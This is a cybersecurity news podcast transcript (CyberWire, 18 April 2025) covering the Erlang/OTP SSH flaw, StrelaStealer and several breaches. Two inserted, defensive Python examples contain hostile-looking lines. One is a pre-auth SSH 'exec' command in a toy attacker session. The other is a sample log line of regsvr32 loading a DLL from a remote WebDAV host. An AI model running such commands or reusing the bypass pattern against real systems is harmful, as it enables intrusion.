The CyberWire Daily Podcast 4.18.25
Ep 2290 | 4.18.25

SSH-attered trust.

Transcript

A critical vulnerability in Erlang/OTP SSH allows unauthenticated remote code execution. There’s a bipartisan effort to renew a key cybersecurity info sharing law. A newly discovered Linux kernel vulnerability allows local attackers to escalate privileges. A researcher uncovers 57 risky Chrome extensions with a combined 6 million users. AttackIQ shares StrelaStealer simulations. A major live events service provider notifies employees and customers of a data breach. CISA warns of an actively exploited SonicWall vulnerability. An airport retailer agrees to a multi-million dollar settlement stemming from a ransomware attack. A preview of RSAC 2025 with Linda Gray Martin and Britta Glade. Zoom-a-zoom zoom, it’s always DNS.

Today is Friday April 19th 2025. I’m Dave Bittner. And this is your CyberWire Intel Briefing.

A critical vulnerability in Erlang/OTP SSH allows unauthenticated remote code execution. 

Erlang/OTP SSH is widely used in systems that demand high availability and concurrency, particularly in telecommunications, IoT, and embedded devices. Its integration into Erlang’s ecosystem makes it a preferred choice for developers building distributed systems requiring secure remote access.

A critical vulnerability in Erlang/OTP SSH, tracked as CVE-2025-32433, allows unauthenticated remote code execution on affected devices. Discovered by researchers at Ruhr University Bochum, it carries a maximum CVSS score of 10.0. The flaw stems from improper handling of pre-authentication SSH messages, enabling attackers to run commands—often as root—via the SSH daemon. Horizon3’s security team confirmed the exploit is easy to reproduce and could soon see public proofs of concept. All systems using Erlang/OTP’s SSH are impacted. Erlang relies on the OTP stack for components like SSH. Users are urged to upgrade to versions 25.3.2.10 or 26.2.4 immediately. For systems that can’t be patched, access should be limited to trusted IPs or SSH disabled altogether.
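The bug class behind this story is a server that dispatches SSH messages by number without checking whether the peer has authenticated yet. The following is an added illustration, not part of the CyberWire episode and not Erlang/OTP's code: a toy server-side dispatcher in both its unsafe and gated forms, fed a constructed attacker session that sends a channel open and an "exec" request without ever authenticating. Message numbers are the RFC 4250/4252/4254 values; the demo password, the session record, and the "disconnect" return value are assumptions made for the example.

```python
# Added example: pre-auth gating of SSH connection-protocol messages.
# Not Erlang/OTP code; constructed to show the missing-state-check bug class.
from dataclasses import dataclass, field

# Message numbers per RFC 4250 / 4252 / 4254.
SSH_MSG_SERVICE_REQUEST = 5
SSH_MSG_USERAUTH_REQUEST = 50
SSH_MSG_USERAUTH_FAILURE = 51
SSH_MSG_USERAUTH_SUCCESS = 52
SSH_MSG_CHANNEL_OPEN = 90
SSH_MSG_CHANNEL_REQUEST = 98

# The only messages a server should act on before authentication completes.
PRE_AUTH_ALLOWED = {SSH_MSG_SERVICE_REQUEST, SSH_MSG_USERAUTH_REQUEST}

DEMO_PASSWORD = "correct horse"  # assumption for the example only


@dataclass
class Session:
    authenticated: bool = False
    executed: list = field(default_factory=list)  # commands the server ran
    rejected: list = field(default_factory=list)  # message numbers refused pre-auth


def _handle_connection_msg(sess, msg_type, payload):
    """Connection-protocol handling (RFC 4254). Running an 'exec' request is
    exactly what must never happen for an unauthenticated peer."""
    if msg_type == SSH_MSG_CHANNEL_REQUEST and payload.get("request") == "exec":
        sess.executed.append(payload["command"])


def dispatch_vulnerable(sess, msg_type, payload):
    """Dispatches on message number only; authentication state is never
    consulted, so CHANNEL_OPEN / CHANNEL_REQUEST are processed pre-auth."""
    if msg_type == SSH_MSG_USERAUTH_REQUEST:
        if payload.get("password") == DEMO_PASSWORD:
            sess.authenticated = True
            return SSH_MSG_USERAUTH_SUCCESS
        return SSH_MSG_USERAUTH_FAILURE
    if msg_type in (SSH_MSG_CHANNEL_OPEN, SSH_MSG_CHANNEL_REQUEST):
        _handle_connection_msg(sess, msg_type, payload)
    return None


def dispatch_hardened(sess, msg_type, payload):
    """Same dispatcher with the gate the protocol requires: anything outside
    the pre-auth allow-list is refused and the connection is dropped until
    SSH_MSG_USERAUTH_SUCCESS has been sent."""
    if not sess.authenticated and msg_type not in PRE_AUTH_ALLOWED:
        sess.rejected.append(msg_type)
        return "disconnect"
    return dispatch_vulnerable(sess, msg_type, payload)


# Constructed attacker session: open a channel and request 'exec' without
# ever sending a userauth request.
ATTACK_SESSION = [
    (SSH_MSG_CHANNEL_OPEN, {"channel": "session"}),
    (SSH_MSG_CHANNEL_REQUEST, {"request": "exec", "command": "id > /tmp/pwned"}),
]


def run(dispatcher, messages=ATTACK_SESSION):
    """Feed a message sequence to a dispatcher and return the resulting session."""
    sess = Session()
    for msg_type, payload in messages:
        if dispatcher(sess, msg_type, payload) == "disconnect":
            break
    return sess


if __name__ == "__main__":
    v = run(dispatch_vulnerable)
    h = run(dispatch_hardened)
    print("vulnerable executed:", v.executed)                        # ['id > /tmp/pwned']
    print("hardened executed:", h.executed, "rejected:", h.rejected)  # [] [90]
```

The check itself is one line; the point is where it lives. Gating in the dispatcher, before any connection-protocol handler runs, means a new handler cannot be added later that forgets to check. A legitimate session still works with the gate in place: a successful userauth request flips the flag and the same channel messages are then processed.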

There’s a bipartisan effort to renew a key cybersecurity info sharing law. 

Senators Gary Peters (D-MI) and Mike Rounds (R-SD) have introduced the Cybersecurity Information Sharing Extension Act to renew a key 2015 law encouraging businesses to share cyberthreat data with the government. Set to expire in September, the original Cybersecurity Information Sharing Act helped companies report threats like malware and vulnerabilities to DHS while receiving legal protections. The law supports real-time collaboration between private firms and agencies like CISA through efforts like the Joint Cyber Defense Collaborative. It’s credited with aiding responses to major incidents like SolarWinds and Volt Typhoon. Rounds warned that letting it lapse would harm national cyber defenses. Experts agree the law has boosted operational partnerships but say the renewal is a chance to update it for modern privacy, supply chain, and threat realities.

A newly discovered Linux kernel vulnerability allows local attackers to escalate privileges. 

A newly discovered Linux kernel vulnerability, CVE-2024-53141, poses a serious risk by allowing local attackers to escalate privileges and potentially gain root access. With a CVSS score of 7.8, the flaw affects the bitmap:ip set type in the netfilter subsystem, due to improper handling of IP range parameters. Exploit code targets kernel versions 2.6.39 through 6.6.62, enabling attackers to perform out-of-bounds writes, bypass KASLR, and execute kernel-level code. Patches are available, and system administrators are urged to update immediately.

A researcher uncovers 57 risky Chrome extensions with a combined 6 million users. 

Security researcher John Tuckner has uncovered 57 risky Chrome extensions with a combined 6 million users, many of which have excessive permissions and could be used for surveillance or malicious activity. These extensions—often unlisted from the Chrome Web Store and only installable via direct link—claim to offer privacy or ad-blocking services but can monitor browsing behavior, access cookies, modify search results, and execute remote scripts. The most notable, Fire Shield Extension Protection, is heavily obfuscated and communicates with a suspicious domain, unknow.com. Tuckner found multiple extensions linked to the same domain, raising concerns about their potential use as spyware. Google is currently investigating the report, and users are advised to remove any of the flagged extensions and reset their passwords as a precaution. Some extensions have been taken down, but others remain active.

AttackIQ shares StrelaStealer simulations. 

StrelaStealer is a credential-stealing malware targeting email clients like Microsoft Outlook and Mozilla Thunderbird, active since 2022 and attributed to the threat actor HIVE-0145. It spreads via phishing emails containing ZIP files with malicious JavaScript that downloads a DLL payload. Recent campaigns have hit over 100 organizations across Europe and the U.S., with enhanced obfuscation and new delivery methods involving PowerShell and WebDAV. AttackIQ has released attack graphs that simulate StrelaStealer’s behavior—covering its initial infection, system discovery, and data exfiltration—to help organizations test and improve their defenses. These scenarios highlight the importance of monitoring native Windows utilities like Rundll32 and Regsvr32, which are used to launch the malware. Security teams are urged to use these tools to validate detection and mitigation strategies against this growing threat.
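The segment's advice to watch Rundll32 and Regsvr32 only helps if the detection asks the right questions of each process creation: who launched the loader, and where the DLL came from. The following is an added example, not AttackIQ's attack graph and not StrelaStealer's code: a small scanner over constructed, Sysmon-style process-creation records (the key=value line format is an assumption for the example) that flags either loader when it is spawned by a script host or PowerShell, loads a DLL from a user-writable directory, or loads one over a WebDAV or HTTP path, the delivery paths the segment describes.

```python
# Added detection example (not AttackIQ's or StrelaStealer's code).
# Flags rundll32/regsvr32 process creations matching the delivery chain described:
# script-host or PowerShell parent, DLL from a user-writable path, or DLL over WebDAV/HTTP.
import re

# Assumed log shape: one event per line, "Key=Value" pairs, values with spaces quoted.
KV_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')

LOADERS = {"rundll32.exe", "regsvr32.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "powershell.exe", "pwsh.exe", "mshta.exe"}

# Per-user profile locations and Windows\Temp: writable by an unprivileged user.
USER_PATH_RE = re.compile(
    r'\\users\\[^\\]+\\(?:appdata|downloads|desktop|documents)\\|\\windows\\temp\\', re.I)
# WebDAV UNC forms (\\host@80\..., \\host@SSL@443\..., \\host\DavWWWRoot\...) or a raw URL.
WEBDAV_RE = re.compile(r'\\\\[^\\\s]+(?:@ssl)?@\d+\\|\\davwwwroot\\|https?://', re.I)


def parse_event(line):
    """Turn one Key=Value line into a dict, stripping surrounding quotes."""
    return {k: v.strip('"') for k, v in KV_RE.findall(line)}


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def assess(event):
    """Return the list of reasons this event looks like a StrelaStealer-style
    loader launch; an empty list means no finding."""
    if event.get("EventID") != "1" or basename(event.get("Image", "")) not in LOADERS:
        return []
    reasons = []
    cmd = event.get("CommandLine", "")
    if basename(event.get("ParentImage", "")) in SCRIPT_HOSTS:
        reasons.append("script-host or PowerShell parent")
    if USER_PATH_RE.search(cmd):
        reasons.append("DLL in user-writable path")
    if WEBDAV_RE.search(cmd):
        reasons.append("DLL fetched over WebDAV/HTTP")
    return reasons


def scan(lines):
    """Return [(loader_name, reasons)] for every flagged line, in input order."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        reasons = assess(ev)
        if reasons:
            hits.append((basename(ev["Image"]), reasons))
    return hits


# Constructed sample events: two malicious, three benign.
SAMPLE_LOG = [
    r'EventID=1 Image=C:\Windows\System32\rundll32.exe CommandLine="rundll32.exe C:\Users\alice\AppData\Local\Temp\invoice.dll,DllMain" ParentImage=C:\Windows\System32\wscript.exe',
    r'EventID=1 Image=C:\Windows\System32\regsvr32.exe CommandLine="regsvr32.exe /s \\203.0.113.7@80\share\update.dll" ParentImage=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe',
    r'EventID=1 Image=C:\Windows\System32\rundll32.exe CommandLine="rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL" ParentImage=C:\Windows\System32\svchost.exe',
    r'EventID=1 Image=C:\Windows\System32\regsvr32.exe CommandLine="regsvr32.exe /s C:\Windows\System32\scrrun.dll" ParentImage=C:\Windows\System32\msiexec.exe',
    r'EventID=1 Image=C:\Windows\System32\notepad.exe CommandLine=notepad.exe ParentImage=C:\Windows\explorer.exe',
]

if __name__ == "__main__":
    for loader, reasons in scan(SAMPLE_LOG):
        print(f"{loader}: {', '.join(reasons)}")
```

Each hit carries every reason that fired, which is what an analyst wants when tuning: a rundll32 launched by wscript.exe from a user's Temp directory is two independent signals, not one, and a finding with only the "user-writable path" reason is where the false positives from legitimate installers will cluster.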

A major live events service provider notifies employees and customers of a data breach. 

Legends International, a major live events service provider, is notifying employees and customers of a data breach discovered on November 9, 2024. The company took systems offline and found that attackers exfiltrated files containing sensitive data, including Social Security numbers, driver’s license details, payment card info, and medical records. Over 8,000 Texans were affected, though the full scope remains unknown. While there’s no evidence of misuse, impacted individuals are being offered two years of free identity protection. No group has claimed responsibility.

CISA warns of an actively exploited SonicWall vulnerability. 

CISA has warned U.S. federal agencies to patch a high-severity remote code execution vulnerability, CVE-2021-20035, affecting SonicWall SMA 100 series appliances. The flaw allows low-privileged, remote attackers to execute arbitrary code via the SMA100 management interface. Initially considered a denial-of-service issue, SonicWall recently upgraded its severity and confirmed it is being actively exploited. Agencies must patch by May 7, and all organizations are urged to act swiftly to prevent potential breaches.

An airport retailer agrees to a multi-million dollar settlement stemming from a ransomware attack. 

Airport retailer Paradies Shops has agreed to a $6.9 million settlement to resolve a class-action lawsuit stemming from a 2020 ransomware attack that exposed personal data of 76,000 current and former employees. The breach, linked to the REvil ransomware group, compromised names and Social Security numbers after hackers accessed systems for five days. Plaintiffs accused the company of negligence and delayed notification. While denying wrongdoing, Paradies opted to settle to avoid prolonged litigation. The deal follows a growing trend of post-breach class actions.


Zoom-a-zoom zoom, it’s always DNS. 

And finally, our “it’s always DNS desk” reports that earlier this week, millions of people found themselves staring into the void—of a broken Zoom link. The beloved video call platform went dark for nearly two hours, not because of hackers or server meltdowns, but due to a digital game of telephone gone hilariously wrong. The culprit? A miscommunication between Zoom’s domain registrar, MarkMonitor, and GoDaddy Registry, keeper of the .us domain. In short, GoDaddy accidentally hit the “off” switch on zoom.us, making it disappear from the internet.

While those already mid-meeting continued blissfully unaware, the rest of us were left refreshing error messages and briefly wondering if the apocalypse had begun. DNS cache delays meant the fix took a while to ripple across the web, and Zoom had to walk users through techy tasks like flushing their DNS (cue the Googling).

Zoom has since slapped a registry lock on its domain. Better late than never…

And that’s the CyberWire.

For links to all of today’s stories, check out our Daily Briefing at the cyberwire dot com.


We’d love to know what you think of this podcast. Your feedback ensures we deliver the insights that keep you a step ahead in the rapidly changing world of cybersecurity. If you like the show, please share a rating and review in your podcast app. Please also fill out the survey in the show notes or send an email to cyberwire@n2k.com.

We’re privileged that N2K CyberWire is part of the daily routine of the most influential leaders and operators in the public and private sector, from the Fortune 500 to many of the world’s preeminent intelligence and law enforcement agencies.

N2K makes it easy for companies to optimize your biggest investment, your people. We make you smarter about your teams, while making your teams smarter. Learn how at n2k.com.


N2K’s senior producer is Alice Carruth. Our CyberWire producer is Liz Stokes. We’re mixed by Tré Hester, with original music and sound design by Elliott Peltzman. Our executive producer is Jennifer Eiben. Peter Kilpe is our publisher, and I’m Dave Bittner. Thanks for listening.